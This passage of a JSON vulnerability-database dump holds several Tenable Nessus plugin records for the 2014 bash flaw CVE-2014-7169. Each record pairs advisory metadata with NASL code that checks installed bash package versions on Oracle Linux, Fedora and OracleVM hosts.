"cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-3077.NASL", "href": "https://www.tenable.com/plugins/nessus/77893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3077.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77893);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3077)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004483.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:11:09", "description": "Swapping Florian's unofficial patches for those released by bash upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-12202.NASL", "href": "https://www.tenable.com/plugins/nessus/78058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12202.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78058);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Swapping Florian's unofficial patches for those released by bash\nupstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c47a82e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) 
audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.51-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2014-3075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-3075.NASL", "href": "https://www.tenable.com/plugins/nessus/77891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3075.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77891);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", 
value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2014-3075)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004480.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.1.0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": 
null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3078.NASL", "href": "https://www.tenable.com/plugins/nessus/77894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77894);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3078)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004482.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2014-3076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-3076.NASL", "href": "https://www.tenable.com/plugins/nessus/77892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3076.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77892);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 7 : bash (ELSA-2014-3076)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004479.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2.0.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:37", "description": "The remote 
OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : bash (OVMSA-2014-0024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2014-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/78239", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78239);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 2.2 : bash (OVMSA-2014-0024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000224.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f04c161\");\n script_set_attribute(attribute:\"solution\", 
value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
